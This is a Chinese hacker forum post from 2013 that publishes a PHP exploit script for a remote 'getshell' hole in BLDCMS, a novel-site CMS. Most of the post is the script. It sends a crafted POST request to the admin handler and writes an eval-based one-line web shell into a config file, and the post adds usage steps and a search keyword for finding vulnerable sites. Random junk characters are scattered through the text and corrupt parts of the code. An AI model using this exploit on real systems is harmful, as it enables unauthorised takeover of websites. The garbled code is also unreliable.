找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2318|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
; A' }9 M$ y. K. h2 i( {- A3 T6 ^% U6 Z3 x+ R# [$ T

8 z2 H) z0 J% |" ?  h% K- ~: a8 p话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 6 s4 _, `; T( [! C! U
; M6 R2 B7 i& V) M# j, Y+ e/ ?
既然都有人发了 我就把我之前写好的EXP放出来吧& j3 T. }/ U& x( q8 K
. a1 d8 b( Y0 ^8 n6 x
view source print?01.php;">
4 Z( P5 e4 ?- @# [4 y: I02.<!--?php; _* P4 ?+ G+ F4 d' Z1 |# l6 r" H8 \
03.echo "-------------------------------------------------------------------: p! j0 N: K% n3 q5 S0 N, Y& g
04. ( C# u/ ^& X7 D3 K
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
" C/ z+ q8 v" w+ ^$ I3 O06.
! H; l! A. P1 P( V6 |% ]1 G07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
3 ~0 L: Y, j* g08.
. W0 M" y7 ^" c& S" R) a+ N8 n; [8 t09.QQ:981009941\r\n                                2013.3.21\r\n             / [+ k( o8 j/ X0 w) |
10. % N- s5 j* o3 \! u( l1 Q% O
11. ! i3 m3 W! A+ J5 g, m% E
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码+ N# m' a% ~7 u7 [/ E
13. $ m6 ^* `4 a  s+ q  b; w" p
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
% V# g' ?* E! J7 y3 `6 \15. 9 h0 {7 C  w0 n
16.--------------------------------------------------------------------\r\n";) a+ n& N7 R1 m8 v4 W0 c: v
17.$url=$argv[1];
1 u- J3 C  }% X9 q0 s8 G/ v* N/ d( O6 a18.$dir=$argv[2];
% x4 ]7 N, L9 @0 Z$ G19.$pass=$argv[3];
" S8 f. Z% T8 [& V% w! F4 R20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; r2 v' E8 |0 T1 c- x* ~+ l21.if (emptyempty($pass)||emptyempty($url))' r1 v, {- e7 D2 L. b# H7 r
22.{exit("请输入参数");}- m- n/ ~% B5 Y2 u
23.else
: T7 ^. U/ I, A$ h5 W24.{
, H7 ?; W% O4 t2 ^5 c+ f- H25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev3 e8 C# v; _' o) Q
26.
0 o! U3 y3 T6 S0 z! U27.al;
% @' V; ]" Y0 B1 u" ]28.$length = strlen($fuckdata);
* k4 e- i5 |' a5 l29.function getshell($url,$pass)
! n1 c5 W7 N  ?- M* ~30.{; a2 D9 }1 x: I& X. u% h
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
$ e6 J1 S8 V; o32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
7 [9 Z- y4 H; y3 V; q- _33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";) h) ~# d4 e3 u& `$ @
34.$header .= "User-Agent: MSIE\r\n";8 M. l, {( I2 S$ ^
35.$header .= "Host:".$url."\r\n";
5 v5 ?4 l: S4 q! M" G36.$header .= "Content-Length: ".$length."\r\n";
; z/ z# x* ^' q4 z3 Q* W: W37.$header .= "Connection: Close\r\n";
6 N# G& z6 l9 u% a2 ]& r( J7 m/ g+ @38.$header .="\r\n";% z" O' x2 @1 ^/ v( w
39.$header .= $fuckdata."\r\n\r\n";; K# E' T3 a$ r
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
! ]* \( w5 L4 J& B$ v41.if (!$fp)+ ]+ T6 @- D  ~' R% ^) l7 y: f2 p. S
42.{* h0 h7 U6 H9 ^6 p! d9 B- n
43.exit ("利用失败:请检查指定目标是否能正常打开");: j3 N+ s* R/ R3 {$ d
44.}% @( }* A- L* u; L: N
45.else{ if (!fputs($fp,$header))
$ J9 |- o1 m# }% K! k( ]46.{exit ("利用失败");}
& V# o. u- `: D47.else
3 d; E% K3 q, M: q48.{6 y! w0 |& s# q( F; `6 x. T! o( C& @1 h
49.$receive = '';
$ y4 @- T  ]  S50.while (!feof($fp)) {+ O4 p& A! P& A: N% y
51.$receive .= @fgets($fp, 1000);+ T1 I3 p/ |, E% o' k1 M8 `
52.}& \' [9 m  m& m9 v( A
53.@fclose($fp);+ F0 P4 k; S4 V+ x" [5 \4 z, a  Z
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标' y4 d( N! Y/ R
55.
5 z( |* f0 S5 V56.GPC是否=off)";# a! x* M2 D5 U  {4 x$ O" [
57.}}
3 B. w% s1 S. v4 Y4 v1 v58.}
: I' l8 u7 J" F+ @# J% W59.}9 L. \& }6 J: r: d$ R* Z. M
60.getshell($url,$pass);% D" @% B  c2 }6 d3 n& R
61.?-->9 M# }& b6 G5 ?
( d7 }: v- l# O/ }) m: P% q
" g6 r* F( M. D9 i7 N& n6 z

9 Y. }, C+ w" k- Iby 数据流; B, x* G+ P7 u! T! z/ ~0 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表